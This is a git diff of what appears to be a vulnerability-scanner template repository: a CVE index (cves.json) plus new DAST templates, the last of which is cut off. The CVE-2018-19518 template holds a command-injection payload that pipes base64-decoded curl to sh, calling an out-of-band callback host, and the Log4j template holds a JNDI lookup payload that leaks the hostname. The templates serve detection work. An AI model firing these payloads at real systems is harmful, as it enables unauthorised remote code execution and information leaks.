unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} +{"ID":"CVE-2023-6114","Info":{"Name":"Duplicator \u003c 1.5.7.1; Duplicator Pro \u003c 4.5.14.2 - Unauthenticated Sensitive Data Exposure","Severity":"high","Description":"The Duplicator WordPress plugin before 1.5.7.1, Duplicator Pro WordPress plugin before 4.5.14.2 does not disallow listing the `backups-dup-lite/tmp` directory (or the `backups-dup-pro/tmp` directory in the Pro version), which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to discover and access these sensitive files, which include a full database dump and a zip archive of the site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6114.yaml"} +{"ID":"CVE-2023-6360","Info":{"Name":"WordPress My Calendar \u003c3.4.22 - SQL Injection","Severity":"critical","Description":"WordPress My Calendar plugin versions before 3.4.22 are vulnerable to an unauthenticated SQL injection within the 'from' and 'to' parameters of the '/my-calendar/v1/events' REST route.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6360.yaml"} {"ID":"CVE-2023-6379","Info":{"Name":"OpenCMS 14 \u0026 15 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6379.yaml"} {"ID":"CVE-2023-6380","Info":{"Name":"OpenCms 14 \u0026 15 - Open Redirect","Severity":"medium","Description":"Open redirect vulnerability has been found in the Open CMS product affecting versions 14 and 15 of the 'Mercury' template\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-6380.yaml"} {"ID":"CVE-2023-6553","Info":{"Name":"Worpress Backup Migration \u003c= 1.3.7 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1.3.7 via the /includes/backup-heart.php file. This is due to an attacker being able to control the values passed to an include, and subsequently leverage that to achieve remote code execution. This makes it possible for unauthenticated threat actors to easily execute code on the server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6553.yaml"} +{"ID":"CVE-2023-6567","Info":{"Name":"LearnPress \u003c= 4.2.5.7 - SQL Injection","Severity":"high","Description":"The LearnPress plugin for WordPress is vulnerable to time-based SQL Injection via the 'order_by' parameter in all versions up to, and including, 4.2.5.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6567.yaml"} {"ID":"CVE-2023-6623","Info":{"Name":"Essential Blocks \u003c 4.4.3 - Local File Inclusion","Severity":"critical","Description":"Wordpress Essential Blocks plugin prior to 4.4.3 was discovered to be vulnerable to a significant Local File Inclusion vulnerability that may be exploited by any attacker, regardless of whether they have an account on the site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6623.yaml"} {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"} {"ID":"CVE-2023-6831","Info":{"Name":"mlflow - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2023/CVE-2023-6831.yaml"} {"ID":"CVE-2023-6875","Info":{"Name":"WordPress POST SMTP Mailer \u003c= 2.8.7 - Authorization Bypass","Severity":"critical","Description":"The POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6875.yaml"} -{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision Intercom Broadcasting System - Command Execution","Severity":"critical","Description":"Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE (HIK) version has an operating system command injection vulnerability. The vulnerability originates from the parameter jsondata[ip] in the file /php/ping.php, which can cause operating system command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} -{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"critical","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"9.3"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} +{"ID":"CVE-2023-6895","Info":{"Name":"Hikvision IP ping.php - Command Execution","Severity":"critical","Description":"A vulnerability was found in Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK). It has been declared as critical. This vulnerability affects unknown code of the file /php/ping.php. The manipulation of the argument jsondata[ip] with the input netstat -ano leads to os command injection. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.0 is able to address this issue. It is recommended to upgrade the affected component. VDB-248254 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6895.yaml"} +{"ID":"CVE-2023-6909","Info":{"Name":"Mlflow \u003c2.9.2 - Path Traversal","Severity":"high","Description":"Path Traversal: '\\..\\filename' in GitHub repository mlflow/mlflow prior to 2.9.2.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6909.yaml"} {"ID":"CVE-2023-6977","Info":{"Name":"Mlflow \u003c2.8.0 - Local File Inclusion","Severity":"high","Description":"Mlflow before 2.8.0 is susceptible to local file inclusion due to path traversal in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-6977.yaml"} {"ID":"CVE-2023-7028","Info":{"Name":"GitLab - Account Takeover via Password Reset","Severity":"critical","Description":"An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2023/CVE-2023-7028.yaml"} {"ID":"CVE-2024-0204","Info":{"Name":"Fortra GoAnywhere MFT - Authentication Bypass","Severity":"critical","Description":"Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0204.yaml"} {"ID":"CVE-2024-0305","Info":{"Name":"Ncast busiFacade - Remote Command Execution","Severity":"high","Description":"The Ncast Yingshi high-definition intelligent recording and playback system is a newly developed audio and video recording and playback system. The system has RCE vulnerabilities in versions 2017 and earlier.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-0305.yaml"} {"ID":"CVE-2024-0352","Info":{"Name":"Likeshop \u003c 2.5.7.20210311 - Arbitrary File Upload","Severity":"critical","Description":"A vulnerability classified as critical was found in Likeshop up to 2.5.7.20210311. This vulnerability affects the function FileServer::userFormImage of the file server/application/api/controller/File.php of the component HTTP POST Request Handler. The manipulation of the argument file with an unknown input leads to a unrestricted upload vulnerability. The CWE definition for the vulnerability is CWE-434\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-0352.yaml"} {"ID":"CVE-2024-0713","Info":{"Name":"Monitorr Services Configuration - Arbitrary File Upload","Severity":"high","Description":"A vulnerability was found in Monitorr 1.7.6m. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /assets/php/upload.php of the component Services Configuration. The manipulation of the argument fileToUpload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251539. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2024/CVE-2024-0713.yaml"} -{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"medium","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} -{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"high","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} -{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} +{"ID":"CVE-2024-1021","Info":{"Name":"Rebuild \u003c= 3.5.5 - Server-Side Request Forgery","Severity":"critical","Description":"There is a security vulnerability in Rebuild 3.5.5, which is due to a server-side request forgery vulnerability in the URL parameter of the readRawText function of the HTTP Request Handler component.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1021.yaml"} +{"ID":"CVE-2024-1061","Info":{"Name":"WordPress HTML5 Video Player - SQL Injection","Severity":"critical","Description":"WordPress HTML5 Video Player plugin is vulnerable to SQL injection. An unauthenticated attacker can exploit this vulnerability to perform SQL injection attacks.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1061.yaml"} +{"ID":"CVE-2024-1071","Info":{"Name":"WordPress Ultimate Member 2.1.3 - 2.8.2 – SQL Injection","Severity":"critical","Description":"The Ultimate Member - User Profile, Registration, Login, Member Directory, Content Restriction \u0026 Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the ‘sorting’ parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1071.yaml"} {"ID":"CVE-2024-1208","Info":{"Name":"LearnDash LMS \u003c 4.10.3 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.2 via API. This makes it possible for unauthenticated attackers to obtain access to quiz questions.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1208.yaml"} {"ID":"CVE-2024-1209","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure via assignments","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via direct file access due to insufficient protection of uploaded assignments. This makes it possible for unauthenticated attackers to obtain those uploads.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1209.yaml"} {"ID":"CVE-2024-1210","Info":{"Name":"LearnDash LMS \u003c 4.10.2 - Sensitive Information Exposure","Severity":"medium","Description":"The LearnDash LMS plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.10.1 via API. This makes it possible for unauthenticated attackers to obtain access to quizzes.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-1210.yaml"} {"ID":"CVE-2024-1212","Info":{"Name":"Progress Kemp LoadMaster - Command Injection","Severity":"critical","Description":"Unauthenticated remote attackers can access the system through the LoadMaster management interface, enabling arbitrary system command execution.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1212.yaml"} {"ID":"CVE-2024-1698","Info":{"Name":"NotificationX \u003c= 2.8.2 - SQL Injection","Severity":"critical","Description":"The NotificationX - Best FOMO, Social Proof, WooCommerce Sales Popup \u0026 Notification Bar Plugin With Elementor plugin for WordPress is vulnerable to SQL Injection via the 'type' parameter in all versions up to, and including, 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-1698.yaml"} -{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} +{"ID":"CVE-2024-1709","Info":{"Name":"ConnectWise ScreenConnect 23.9.7 - Authentication Bypass","Severity":"critical","Description":"ConnectWise ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-1709.yaml"} +{"ID":"CVE-2024-20767","Info":{"Name":"Adobe ColdFusion - Arbitrary File Read","Severity":"high","Description":"ColdFusion versions 2023.6, 2021.12 and earlier are affected by an Improper Access Control vulnerability that could lead to arbitrary file system read. An attacker could leverage this vulnerability to bypass security measures and gain unauthorized access to sensitive files and perform arbitrary file system write. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2024/CVE-2024-20767.yaml"} {"ID":"CVE-2024-21644","Info":{"Name":"pyLoad Flask Config - Access Control","Severity":"high","Description":"pyLoad is the free and open-source Download Manager written in pure Python. Any unauthenticated user can browse to a specific URL to expose the Flask config, including the `SECRET_KEY` variable. This issue has been patched in version 0.5.0b3.dev77.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-21644.yaml"} {"ID":"CVE-2024-21645","Info":{"Name":"pyload - Log Injection","Severity":"medium","Description":"A log injection vulnerability was identified in pyload. This vulnerability allows any unauthenticated actor to inject arbitrary messages into the logs gathered by pyload.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-21645.yaml"} {"ID":"CVE-2024-21887","Info":{"Name":"Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) - Command Injection","Severity":"critical","Description":"A command injection vulnerability in web components of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the appliance.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2024/CVE-2024-21887.yaml"} @@ -2317,6 +2338,12 @@ {"ID":"CVE-2024-27198","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"critical","Description":"In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27198.yaml"} {"ID":"CVE-2024-27199","Info":{"Name":"TeamCity \u003c 2023.11.4 - Authentication Bypass","Severity":"high","Description":"In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-27199.yaml"} {"ID":"CVE-2024-27497","Info":{"Name":"Linksys E2000 1.0.06 position.js Improper Authentication","Severity":"high","Description":"Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27497.yaml"} +{"ID":"CVE-2024-27564","Info":{"Name":"ChatGPT个人专用版 - Server Side Request Forgery","Severity":"high","Description":"A Server-Side Request Forgery (SSRF) in pictureproxy.php of ChatGPT commit f9f4bbc allows attackers to force the application to make arbitrary requests via injection of crafted URLs into the urlparameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-27564.yaml"} +{"ID":"CVE-2024-27954","Info":{"Name":"WordPress Automatic Plugin \u003c3.92.1 - Arbitrary File Download and SSRF","Severity":"critical","Description":"WordPress Automatic plugin \u003c3.92.1 is vulnerable to unauthenticated Arbitrary File Download and SSRF Located in the downloader.php file, could permit attackers to download any file from a site. Sensitive data, including login credentials and backup files, could fall into the wrong hands. This vulnerability has been patched in version 3.92.1.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-27954.yaml"} +{"ID":"CVE-2024-28255","Info":{"Name":"OpenMetadata - Authentication Bypass","Severity":"critical","Description":"OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-28255.yaml"} +{"ID":"CVE-2024-28734","Info":{"Name":"Coda v.2024Q1 - Cross-Site Scripting","Severity":"medium","Description":"Cross Site Scripting vulnerability in Unit4 Financials by Coda v.2024Q1 allows a remote attacker to escalate privileges via a crafted script to the cols parameter.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-28734.yaml"} +{"ID":"CVE-2024-29059","Info":{"Name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","Severity":"high","Description":".NET Framework Information Disclosure Vulnerability","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2024/CVE-2024-29059.yaml"} +{"ID":"CVE-2024-29269","Info":{"Name":"Telesquare TLR-2005KSH - Remote Command Execution","Severity":"critical","Description":"Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-29269.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} @@ -2328,7 +2355,6 @@ {"ID":"CVE-2018-2893","Info":{"Name":"Oracle WebLogic Server - Remote Code Execution","Severity":"critical","Description":"The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 10.3.6.0, 12.1.3.0, 12.2.1.2 and 12.2.1.3 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2018/CVE-2018-2893.yaml"} {"ID":"CVE-2020-11981","Info":{"Name":"Apache Airflow \u003c=1.10.10 - Command Injection","Severity":"critical","Description":"An issue was found in Apache Airflow versions 1.10.10 and below. When using CeleryExecutor, if an attacker can connect to the broker (Redis, RabbitMQ) directly, it is possible to inject commands, resulting in the celery worker running arbitrary commands.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-11981.yaml"} {"ID":"CVE-2020-1938","Info":{"Name":"Ghostcat - Apache Tomcat - AJP File Read/Inclusion Vulnerability","Severity":"critical","Description":"When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-1938.yaml"} -{"ID":"CVE-2020-7247","Info":{"Name":"OpenSMTPD 6.4.0-6.6.1 - Remote Code Execution","Severity":"critical","Description":"OpenSMTPD versions 6.4.0 - 6.6.1 are susceptible to remote code execution. smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the \"uncommented\" default configuration. The issue exists because of an incorrect return value upon failure of input validation.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2020/CVE-2020-7247.yaml"} {"ID":"CVE-2021-44521","Info":{"Name":"Apache Cassandra Load UDF RCE","Severity":"critical","Description":"When running Apache Cassandra with the following configuration: enable_user_defined_functions: true enable_scripted_user_defined_functions: true enable_user_defined_functions_threads: false it is possible for an attacker to execute arbitrary code on the host. The attacker would need to have enough permissions to create user defined functions in the cluster to be able to exploit this. Note that this configuration is documented as unsafe, and will continue to be considered unsafe after this CVE.","Classification":{"CVSSScore":"9.1"}},"file_path":"network/cves/2021/CVE-2021-44521.yaml"} {"ID":"CVE-2022-0543","Info":{"Name":"Redis Sandbox Escape - Remote Code Execution","Severity":"critical","Description":"This template exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The\nvulnerability was introduced by Debian and Ubuntu Redis packages that\ninsufficiently sanitized the Lua environment. The maintainers failed to\ndisable the package interface, allowing attackers to load arbitrary libraries.\n","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2022/CVE-2022-0543.yaml"} {"ID":"CVE-2022-24706","Info":{"Name":"CouchDB Erlang Distribution - Remote Command Execution","Severity":"critical","Description":"In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2022/CVE-2022-24706.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index fc1928fe0c..716c0fb175 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -0718093f8377862f2723b488bb15e23a +70ec4e132bf5f0a5c3a4325d6a647f3a diff --git a/dast/cves/2018/CVE-2018-19518.yaml b/dast/cves/2018/CVE-2018-19518.yaml new file mode 100644 index 0000000000..b698a2abd7 --- /dev/null +++ b/dast/cves/2018/CVE-2018-19518.yaml @@ -0,0 +1,49 @@ +id: CVE-2018-19518 + +info: + name: PHP imap - Remote Command Execution + author: princechaddha + severity: high + description: | + University of Washington IMAP Toolkit 2007f on UNIX, as used in imap_open() in PHP and other products, launches an rsh command (by means of the imap_rimap function in c-client/imap4r1.c and the tcp_aopen function in osdep/unix/tcp_unix.c) without preventing argument injection, which might allow remote attackers to execute arbitrary OS commands if the IMAP server name is untrusted input (e.g., entered by a user of a web application) and if rsh has been replaced by a program with different argument semantics. For example, if rsh is a link to ssh (as seen on Debian and Ubuntu systems), then the attack can use an IMAP server name containing a "-oProxyCommand" argument. + reference: + - https://github.com/vulhub/vulhub/tree/master/php/CVE-2018-19518 + - https://nvd.nist.gov/vuln/detail/CVE-2018-19518 + - https://www.openwall.com/lists/oss-security/2018/11/22/3 + - https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.5 + cve-id: CVE-2018-19518 + cwe-id: CWE-88 + metadata: + confidence: tenative + tags: imap,dast,vulhub,cve,cve2018,rce,oast,php + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + php-imap: + - "x -oProxyCommand=echo {{base64(url_encode('curl {{interactsh-url}}'))}}|base64 -d|sh}" + + fuzzing: + - part: query + fuzz: + - "{{php-imap}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol + words: + - http + + - type: word + part: interactsh_request + words: + - "User-Agent: curl" +# digest: 4a0a00473045022100af7a090c8826b8f7eb0934a5a130dc05780441afce33b5e31dda44213d47691e02205499f8bad4923cabbddd841491363890751a97b823905e848b6ed457c4d2ecab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2021/CVE-2021-45046.yaml b/dast/cves/2021/CVE-2021-45046.yaml new file mode 100644 index 0000000000..495aa6d985 --- /dev/null +++ b/dast/cves/2021/CVE-2021-45046.yaml @@ -0,0 +1,62 @@ +id: CVE-2021-45046-DAST + +info: + name: Apache Log4j2 - Remote Code Injection + author: princechaddha + severity: critical + description: Apache Log4j2 Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. + reference: + - https://securitylab.github.com/advisories/GHSL-2021-1054_GHSL-2021-1055_log4j2/ + - https://twitter.com/marcioalm/status/1471740771581652995 + - https://logging.apache.org/log4j/2.x/ + - http://www.openwall.com/lists/oss-security/2021/12/14/4 + - https://nvd.nist.gov/vuln/detail/CVE-2021-44228 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9 + cve-id: CVE-2021-45046 + cwe-id: CWE-502 + metadata: + confidence: tenative + tags: cve,cve2021,rce,oast,log4j,injection,dast + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + log4j: + - "${jndi:ldap://127.0.0.1#.${hostName}.{{interactsh-url}}}" + + fuzzing: + - part: query + fuzz: + - "{{log4j}}" + + matchers-condition: and + matchers: + - type: word + part: interactsh_protocol # Confirms the DNS Interaction + words: + - "dns" + + - type: regex + part: interactsh_request + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output + + extractors: + - type: regex + part: interactsh_request + group: 2 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + + - type: regex + part: interactsh_request + group: 1 + regex: + - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output +# digest: 4a0a00473045022036888452035d1bfa69cbc32805393a712fdcd5595224466cc327e681ba5ef5770221008096d4d19c6975ad5bd44b06d4bc1cdfd0746570cb65c17c50cf4eb2e8a7b10d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/dast/cves/2022/CVE-2022-34265.yaml b/dast/cves/2022/CVE-2022-34265.yaml new file mode 100644 index 0000000000..4d00cfb7bd --- /dev/null +++ b/dast/cves/2022/CVE-2022-34265.yaml @@ -0,0 +1,47 @@ +id: CVE-2022-34265 + +info: + name: Django - 